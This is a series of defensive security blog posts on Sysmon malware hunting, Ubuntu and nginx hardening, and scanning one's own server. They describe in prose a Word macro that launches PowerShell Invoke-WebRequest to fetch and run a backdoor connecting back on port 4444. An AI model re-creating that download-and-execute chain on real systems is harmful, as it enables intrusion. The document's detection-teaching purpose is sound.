Detecting a Cyber Attack Part 4 (Sysmon – Basic malware hunting 2)

In our first malware hunting blog we looked at an incident where a user had downloaded a malicious application from a website. Here we are going to investigate a malicious document which was received via email. This is our second basic investigation , but we will continue to ramp things up over the coming months.

Modern antivirus, despite being very good at identifying and blocking known threats, it can still be easily bypassed by unknown exploits (zero days) and malicious MS Office document macros. It can also have issues like any other software preventing it from working correctly which is why you need an effective logging solution that allows investigations to identify instances where malware has circumvented any protection in place.

This blog will use techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt you can use the same malicious exe and website from that exercise. The first blog is here;

In our scenario and end user has been duped into opening a malicious document. We have received some unusual traffic alerts on the firewall from this asset, so we connect to take a look. Let’s jump in.

Although we don’t know it yet, the user received the below document

which when opened started a malicious script which started a remote connection back to the attacker providing full access to the asset. This process is shown in the series of images below.

Once the victim has clicked yes in the document, the attacker sees the connection in their terminal.

The malicious process is running as PID 4048.

We obviously do not have this information yet, but luckily we have sysmon configured as covered in the previous blogs so let’s see what we can find.

We know the user works in Finance, we know when we first saw alerts in the firewall, and we also know that the number one attack vector for end users is phishing emails. Speak to the user, do they remember opening an attachment which crashed, or received any unusual emails, or pop ups when browsing the internet. All and any info the user can provide could be important.

We decide to look for unusual activity relating to Office programs as a start. Now obviously we can just run netstat and look for unusual connections, but we are concentrating on sysmon here.

We find a Word doc being opened by WINWORD.EXE but nothing odd yet

However this next log looks suspicious as we have what appears to be WINWORD.EXE (ParentImage) opening cmd.exe (Image), and the parent commandline seems to be the word doc we saw earlier.

Now we have cmd.exe launching powershell, which then runs an “Invoke-WebRequest” commandline which is used to download files. Here it creates a file named “secure.exe”

We now have powershell launching another powershell instance which instructs the session to wait for 10 seconds.

Next we see powershell making an outbound connection to the same website mentioned in the above logs

And finally here we see confirmation of the malicious remote session connecting to “” on port 4444, with the Process ID of 4048.

If we refer back to Task Manager we can see that this matches the malicious exe.

Again this is a basic technique, but it will help you to understand the types of things you should be looking for. In future blogs we will go on to look at obfuscated commands and how we decode them to get the information we need.

Detecting a Cyber Attack Part 3 (Sysmon – Basic malware hunting)

In our first two blogs of this series we installed and configured a basic Sysmon set up with a verbose custom view, now we are going to show how even this simple set up can help with threat hunting and incident response. This is a very basic investigation to start with, but we will continue to ramp things up over the coming months.

Modern antivirus, despite being very good at identifying and blocking known threats, it can still be easily bypassed by unknown exploits (zero days) and malicious MS Office document macros. It can also have issues like any other software preventing it from working correctly which is why you need an effective logging solution that allows investigations to identify instances where malware has circumvented any protection in place.

This blog will use techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt you can use the same malicious exe and website from that exercise. The first blog is here;

In our scenario and end user has been duped into visiting a malicious website and downloading an application. They contact the service desk to report they think they have made a mistake, and we are going to try and identify if there is any malicious activity on their asset. Let’s jump in.

Our user has visiting the following site

And run the following application from the site

The download claims to be an update for flash player

We connect to the asset, open Event Viewer and select our custom view we created earlier. We know the rough time they visited the website and we quickly find a file create alert at the same time for the file “update_flash.exe”

The next log entry shows the process create entry for “flash_update.exe” which was downloaded from

We now have the .exe name and the website address. The same log also shows the process ID (2508) and the parent process ID (3584). Let’s use Task Manager to see if we can gather a bit more info, and see if they are still running.

Once Task Manager has opened select to show processes from all users.

Then select “view”

and ensure PID is ticked so the process identifier column is displayed

Now we can see the PID, click the column header to sort numerically making them easier to find.

We can see the parent process 3584, but no sign of 2508 even though we can see “flash_update.exe” is still running but under a different PID.

Let’s right click the “flash_update.exe” process and look at the properties.

We can see that although the exe is named flash_update the description is completely different, and the product name seems to suggest it is something to do with a http server.

If we compare this to a genuine Adobe file already installed on the same asset it’s clear something is not right.

The genuine file also has a digital signature.

Let’s back back into the Sysmon logs and look for more info. Below we can see in the time line after the file create, and process create we have a network connection detected for the same “flash_update.exe”. Sysmon gives us a bucket load of information for this including;

  • The process ID
  • Source and destination hostname
  • Source and destination IP addresses
  • Source and destination port numbers

Let’s open a cmd prompt and use netstat to look for the connection.

We are going to use the flags “a” “n” “o” with the below cmd.

  • -a – Displays all active TCP connections and the TCP and UDP ports on which the computer is listening
  • -n – Displays active TCP connections, however, addresses and port numbers are expressed numerically and no attempt is made to determine names.
  • -o – Displays active TCP connections and includes the process ID (PID) for each connection. You can find the application based on the PID on the Processes tab in Windows Task Manager.

You can simply use netstat to identify just tcp ports, or just the specified port but for demo purposes we are using “-ano” There’s a good netstat tutorial here;

We have highlighted the column headers this command provides and also highlighted the malicious process we have identified as running on this asset.

Sysmon has provided most of the information we need to be able to either monitor the machine for further information or terminate the malicious process.

Here we have the attackers view of the connection

Here we have shown how to run a basic investigation using only Sysmon and Task Manager, there are lot’s of other tools at our disposal and we will cover some of these in the future.

Detecting a Cyber Attack Part 2 (Sysmon – Create a verbose custom view)

As covered in the previous blog, sysmon is very powerful for logging and alerting, however the logs are hidden deep in the folder structure of Event Viewer so ideally we want to be able to have quick access to these logs when threat hunting locally on an asset. (We will cover centralising logs later in the series or have a read of our previous blog series on building a free SIEM solution. The sysmon part is here if you want to take a look.

However back to today’s blog. We don’t want to have to go searching for sysmon logs and sometimes we want a different level of logging, either verbose or brief depending on how much information you wish to see, which is where custom views come in handy. In this demo will will create a verbose log which will show everything, however in other demos we will create custom views for very specific logs and events. As we are starting from scratch here, we want to see everything.

You’ll find sysmon logs under Event Viewer > Applications and Services > Microsoft > Windows > Sysmon > Operational so let’s open up Event Viewer and create our custom view.(Although we are using Windows 7 here in our lab, the commands are exactly the same in Windows 10)

Type eventvwr in the search bar

Below we see the native location of the sysmon logs

Select create custom view on the right hand side of Event Viewer and complete the steps as shown. Remember we are creating a verbose log so it will create a lot of information.

Tick all the boxes
Select Sysmon from the dropdown
Select All Task Categories
Select all keywords
The completed form should look like this
Create a name and add a description (If you do not add a description it will not work)
We can see our custom view at the top left of Event Viewer.

That’s it! Simple right? In the next blog we will use this view to do some basic malware hunting.

Detecting a Cyber Attack Part 1 (Sysmon – endpoint install)

Now we are finished with our “Creating a Cyber Attack” (Part 1 here; series where we showed how a cyber attack is put together, we are now going to move onto detection.

Sysmon has been around for a while now, but recently is really gaining traction as a must have for organisations. Sysmon basically allows enhanced logging of certain events allowing analysts to more easily identify malicious activity, and configure custom alerts and configurations depending on the environment.

Sysmons capabilities include;

  • Logs process creation with full command line for both current and parent processes.
  • Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH.
  • Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
  • Includes a session GUID in each event to allow correlation of events on same logon session.
  • Logs loading of drivers or DLLs with their signatures and hashes.
  • Logs opens for raw read access of disks and volumes.
  • Optionally logs network connections, including each connection’s source process, IP addresses, port numbers, hostnames and port names.
  • Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
  • Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.

For full capability information visit the link below

For the configuration file we will be using the @swiftonsecurity template from github at the below URL

This is a great template to start off with, and if you open the xml file every line is commented so it’s also great place to learn. In our demo we need to remove the DNS section as it is not supported in Windows 7.

Right let’s get cracking and get Sysmon installed.

To download the official version of Sysmon go to you’ll need to unzip and save to a convenient location.

Then download the config file from here

Now we need to edit the config file, I just did this in good old notepad.

Find the DNS query section, then from “<RuleGroup name=”” groupRelation=”or”> highlight and delete the whole section.

Save your changes, then copy the file so it is in the same folder as your sysmon download.

To install Sysmon you need to run it from an admin cmd prompt, which you can do by right clicking and selecting “run as administrator”.

Once your cmd is open you need to copy the location of your Sysmon files so you can run the command from inside the folder.

type “cd” then paste in your location

Now we just run the cmd as shown below

sysmon.exe -accepteula -i sysmonconfig-export.xml

That’s it! If you receive no errors then Sysmon should be running. Let’s go look at some logs in Event Viewer.

Sysmon logs are stored under

Application and Services Logs/Microsoft/Windows/Sysmon/Operational

The below image shows Sysmon logging us opening Event Viewer

If we now open Firefox we get lot’s of logs showing what it is doing, processes it runs, where it updates from, dlls it uses, and lot’s of other info which if we were hunting malware would be invaluable.

Hoped you enjoyed this quick look at Sysmon, we will be covering it in more detail as we progress.

How to check your own server and website. (QGR)

If you have been following the previous QGR’s and the past few posts we have shown how to install LEMP on Ubuntu, and make sure we have carried out some basic hardening of the OS.

We can verify this internally by checking versions on the server but how do we get the external view and see what an attacker would see? Again, this does not need to be extremely expensive. Let’s dive in and look at some great, freely available tools.

Below is a list of free resources we are going to use in this guide.

Nmap free network scanner download

Immuniweb free website scanner

Free web security headers report

Free WordPress website scanner

OK, now you have all the links, let’s get started.


nmap is a free network scanner and we can use this to verify that our firewall is set correctly, and the exposed applications are running the latest versions. Let’s fire it up and scan our site.


This performs a basic scan of our webserver and the top 1000 ports. (we will cover more advanced scanning in a later post) The results are shown below.

This shows that as expected our server has only 3 ports exposed to the internet. Now let’s do a version check on those services by adding the “-sV” flag.

nmap -sV

We can now see the versions, a quick google shows we are on the latest versions, so we can move on.

If you want to scan all ports then add the “-p” flag, and port range as below

nmap -p 0-65535

immuniweb scan

Right let’s go to immuniwebs site and using the free web scanner let’s scan our site by selecting “community Edition”, and “Website Security Test”.

After around 10 minutes you will get a report as shown below

This report will provide remediation advice if an issues are found so have a good read through. We will come back to these reports in later posts to show best practice configuration, and other tips.

Security Headers

Security headers are important for website security, not only for your site, but also for anyone who visits your site. Browse to the Security Headers website and start a scan. As before after a short while you will receive a report for your site as shown below.

This also has some great resources for helping you to understand what each finding means and how to remediate any issues. As with the other tests, we will come back to these in the next post.

WordPress Security

If you are using WordPress, and making use of themes and plugins it is vital you ensure you are keeping everything up to date. That means the version of WordPress itself, the current live theme, and all plugins you have installed.

Luckily there are free tools for this as well, so lets head over to the wpsec website and launch the scan.

Simply pop in your website URL , tick the box and off we go.

If there are any issues it will tell you on this page,and you can sign up for a free account to receive a more in-depth report.

Ubuntu Hardening Guide – Basic (QGR)

In the past few weeks we have gone through setting up a LEMP stack on Ubuntu to run our WordPress site.

As this is a web server and will be exposed to the internet we need to make sure we do some additional configuration regardless of if it sits behind a Next-Gen Firewall, or Web App Firewall. Perimeter security is no longer sufficient, we need to harden the operating system to provide some strength in depth.

Now you shouldn’t look at this as an all or nothing situation, or that hardening the operating system is something you do once and that’s it. You can start with the basics which greatly reduces your exposure, but it needs to be monitored and maintained over time.

I start with the basics and then dependent on the resources available and the value of the server/data I make improvements over time, this is a great way to learn.

Below are some resources for further information on hardening Ubuntu.

Ubuntu Hardening Wiki

NCSC Hardening Guide

UFW guide

As this is a quick guide we won’t be going into too much detail for each setting, but as always I encourage you to look into this yourself so you understand what we are doing.

In-depth SSH keys guide

Bitvise download

The steps we will take are;

  • Enable ufw. This is a built in host-based firewall.
  • Install fail2ban. This is an intrusion prevention system (IPS) which looks for patterns to identify attacks and block the offending IP addresses.
  • Secure shared memory. Shared memory can be used to attack running services so we need to secure it.
  • Create a non-root user, and grant sudo privileges.
  • Enable key pair SSH login.
  • Disable SSH password authentication and root ssh login.
  • Disable any graphical User interface. (X11 Forwarding)
  • Disconnect idle sessions.
  • Allow/Deny users

Make a back up

Make a back up, now we can continue.

Enable ufw

This configuration is based on the assumption we are using port 22 for SSH, and have ports 80 and 443 open for web services.

ufw is installed by default so you can just enable without the need to install.

sudo ufw enable

And open the 2 ports we need for connecting to it

sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp

You can check status using the below

sudo ufw status


First up, let’s install.

sudo apt-get install fail2ban

fail2ban will work right out of the box, but we can make some small adjustments. Rather than make changes directly to the default config file located at “/etc/fail2ban/jail.conf” we can create a new file named jail.local using the following command.

sudo nano /etc/fail2ban/jail.local

Then add the following to the new file.

enabled = true
port = 22
filter = sshd
logpath = /var/log/auth.log
maxretry = 5

This monitors for brute force login attempts on port 22, now just save and close the file then restart fail2ban

sudo systemctl restart fail2ban

Remember that this will also block YOUR IP if you fail 5 login attempts. You can adjust the time out settings in the “/etc/fail2ban/jail.conf” file.

Protect shared memory space

We need to edit the /etc/fstab file and make a settings change.

sudo nano /etc/fstab

Now we add the following line to the bottom of the file, before saving and closing.

tmpfs /run/shm tmpfs defaults,noexec,nosuid 0 0

This will require a restart which is a simple command.

sudo reboot

Create non-root user with sudo privileges

Logging into your Linux box as root and using it as your everyday account is the same as just using the domain admin or local administrator account as a normal user account. If you don’t understand how bad this is you should go find out!

We will create a standard user account but grant them sudo privileges so you do not have to log out each time you need root. You will able to use the ‘sudo’ command enter a password to elevate to the needed permission level. Let’s get started.

Log in as root and run the following commands picking your own username

adduser newuser

Choose a strong password, and then answering the other questions are optional. Next we assign sudo to the new user.

usermod -aG sudo newuser

That’s it. If you want to change user just use (replace newuser with the desired username)

 su newuser

Enable key pair ssh login.

This is much more secure than password authentication, and again if you do not understand why, I really encourage you to go and find out. As most of you will be connecting to your server via Windows machine I’ll cover setting this up using an ssh gui client, however if you are connecting from a Linux box follow the link in the resources section for a quick way to perform this process via command line.

I’m a fan of Bitvise ssh (link in resource section above) and from here we can easily create our key pair from the login tab and selecting “Client key manager”.

Generate new as shown

Make note of the profile number, and choose a strong passphrase. You can choose a larger key size if you wish but do not go lower.

Now below we can see our new key, and the export button to create a file of our public key.

Export as shown below and remember where you have saved it.

Now login to your Ubuntu machine using your new account and check for the ssh directory, and if we don’t have one we need to create it. The following command will create the directory if it does not exist and do nothing if it does.

mkdir -p ~/.ssh

Now browse here using cd and locate the “authorized_keys” file.

cd ~/.ssh

If “authorized_keys” file is not there then create it

sudo nano authorized_keys 

No go back to your exported file on your local machine and paste the contents into the new file on your Ubuntu machine. This file should start with “ssh-rsa”, then save and close the file.

Now we set permissions making sure you replace “newuser” with your own username

chmod -R go= ~/.ssh
chown -R newuser:newuser ~/.ssh

Now we need to test that this works, so disconnect from the remote session and attempt to login using public key authentication instead of a password. In Bitvise select the correct profile, and pubkey as shown. Obviously you will need the username and host address to connect.

The first time you connect you will receive a warning about key verification, but as long as you are sure you are sure you connecting to the correct host you can accept this the first time you connect. Should you ever see this error again when connecting to this machine you should verify the keys to ensure you are not a victim of malicious activity.

You will then be prompted for the key pair passphrase (not your login password), enter this and you should be logged in. Well done now we need to disable password authentication, and root ssh login.

Disable password authentication and root ssh login

This is a quick and simple one, we just need to edit the sshd_config file and set the options to no.

sudo nano /etc/ssh/sshd_config

Disable any graphical User interface. (X11 Forwarding)

This is set in the same file, find the option and set to no

Disconnect idle sessions

Again, in the same file change the following settings

This setting will check once after 15 minutes of inactivity and close the connection. If you want a longer interval just increase the setting which is in seconds.

Allow/Deny users

Again in the same file we can provide an allow list of users who are permitted to remotely connect over ssh to the machine. You will need to add this manually to the bottom of the file.

Make sure there are no typos and you have added everyone you need to as once this is set if not on the list you will not be able to login via ssh and may be completely locked out of your server. Double check before loading the new config.

To load the new settings we need run the following commands.

sshd -t 

If you receive an error go back and check you changes as you have made a mistake somewhere. If not then restart the service to apply the changes.

sudo service sshd restart

Well done, in the future we will look at more advanced hardening techniques.

Update nginx to latest version

Believe it or not if you install nginx on Ubuntu 18.04 using the default repositories then you get nginx version 14! This version is not even maintained anymore, it’s like installing Office 2003 on you new Windows 10 machine, crazy right?

If you have used our quick guide for installing WordPress on the LEMP stack then this is the version you will have installed.

Let’s show how to fix it then….

First up, let’s add the repository by adding a new .list file

sudo nano /etc/apt/sources.list.d/nginx.list

Then add the following lines to tell our install where to go to get the latest version

deb [arch=amd64] bionic nginx
deb-src bionic nginx

CTRL X to exit, then Y to confirm changes and hit enter.

Next we need the nginx public key, so run the following to download it


Then add the key

sudo apt-key add nginx_signing.key

You should get an “OK” message in the console.

This is where it gets scary, so if you haven’t backed up, do it now. NO……. do it now.!

We remove all the current version components, but first we make a copy of our config file, just in case.

sudo cp /etc/nginx/nginx.conf /etc/nginx/nginx.conf.old

If you are particularly paranoid you can check it’s there

cd /etc/nginx/

Now after using “cd” we are back at the base directory and we can remove the old version of nginx, but first let’s update apt.

sudo apt-get update
sudo apt remove nginx nginx-common nginx-full nginx-core

‘Y’ to continue, and away it goes

We do not even need to reboot, how cool is that? (This ain’t Windows!) so let’s install the latest version

sudo apt-get install nginx -y

You should get no errors as shown below

Run the next two commands individually

sudo systemctl start nginx
sudo systemctl enable nginx

Then check your version

If you have reinstalled version 14, then you did not run “sudo apt-get update” after adding the keys and the new resources list, doh!. (not that I’ve ever done that!)

We are not quite there yet, especially if you have a website already running on the server.

There are 2 additions we need to make if we are using the standard config. (If you have used guides on this site then you will need to do this)

We need to make two changes in the nginx.conf file

sudo nano /etc/nginx/nginx.conf

in this file we need to change “user nginx;” to “user www-data;” which is right at the top.

Then we need to add the following to the bottom of the file “include /etc/nginx/sites-enabled/*;”

Both shown below

Then we reload nginx and we’re done.

sudo systemctl reload nginx

Well done. If it all breaks then I really encourage you to retrace your steps and try and resolve the issue. It’s already broken so who cares if you break it more right? And if it’s that bad, that’s why we made a back-up? You did make a back-up………right?

How to install WordPress on LEMP. (QGR)

This is gonna be the first of a “quick guide with resource links” series where I’ll pick a subject and just post quick links to guides, warn of pitfalls you may encounter, or things you still need to do. (this is for my own future reference as well!)

Hello there……..recently I had to migrate this site to the cloud after years of being hosted in my home lab, and thought I’d do a quick write up while I am at it. Previously I have posted step by step guides for installing my fave stack, but there are so many really good guides I’m just gonna direct you to the best one’s out there for the initial install.

Digital Ocean have some great guides online and are generally where I look first for anything LEMP related. I did have a look at Apache, but I do still prefer nginx as my webserver. There is a good article here; if you want to delve into comparisons.

Don’t just follow these word for word, you will need a little bit knowledge to tailor to your instance if not using Digital Ocean hosting. If you have followed previous guides on my site you will have enough knowledge to follow these. Not to say these aren’t good enough for absolute beginners but if you follow blindly with no basic concept of LEMP, Ubuntu or Linux you will come unstuck.

Links To Resources

The list of articles below are in order of install;

Initial Server Set-up post-install

Installing the LEMP stack

Installing WordPress on the LEMP stack

Setting up your SSH keys


  • Make sure you note any user account names or passwords you create.
  • Double check, then check again before you disable SSH root login, or password authentication. (You’ll only do it once if you lock yourself out of your own server!)
  • Make a backup before each step. You will mess up, or something will go wrong, just make sure you do not have to start from scratch!

Be aware

  • If you publish a WordPress site on the internet, then within minutes it will be scanned and you will see brute for login attempts. (Even if it is just to blog about the progress of mold on your shower curtain)
  • There is still more to do to ensure your site has a decent level of protection
  • If you create a private key, (for anything) make, make, make sure you keep this private. Don’t make loads of copies and forget to delete them.
  • Don’t assume because you ran “apt update” that you have the latest version of any software. Check manually – We will cover this in the future regarding nginx. (Now up)

That’s it for this, I may come back and add or update if I find something else which helps.

Don’t ignore download warnings

In the next of our short videos we show why download warnings should not be ignored. We are using a Windows 7 machine just for ease, this will also work in Windows 10 (I haven’t gotten around to updating all my test victim machines yet!)

When you are browsing the internet and trying to find what you are looking for; one thing you can guarantee is that there will be thousands of malicious sites pretending to be the website you need.

Here our user is looking for some free software to play a video file, after a google search goes to a site they think will have what they want. The site prompts that they need to update their browser, how responsible of them to make sure I am up to date. The update is downloaded, and the browser warns there is an issue with this. However the user is impatient and just wants the software, ignores the warning and installs it. That’s why they have anti-virus right? If it is malicious that what it’s there for.

They continue with the download and run the file. and in the left hand side machine you will see (as you have seen in previous videos) just how quickly this happens, and just how quickly the cyber criminal can take screenshots, pop messages on the screen, and control the machine which we show by launching Windows programs such as calculator and notepad.

The importance of updating

Another quick video to show just how quickly a server can be compromised and taken over completely by an attacker.

In this video we have a server running an out of date and un-patched application, which gives the attacker a way onto the server. Then the attacker dumps and cracks the password hashes, which gives persistent remote (using ssh) access to the system. The attacker can then continue to access the server for whatever purpose they wish

Then the attacker changes the root (admin) password potentially resulting in no one else having admin access to the system. Allowing them to hold the system to ransom or threatening to take it off line to disrupt the business function, or continue to search and remove data unhindered.

This all happens in under 4 minutes. Always stay as up to date with versions and patches as possible.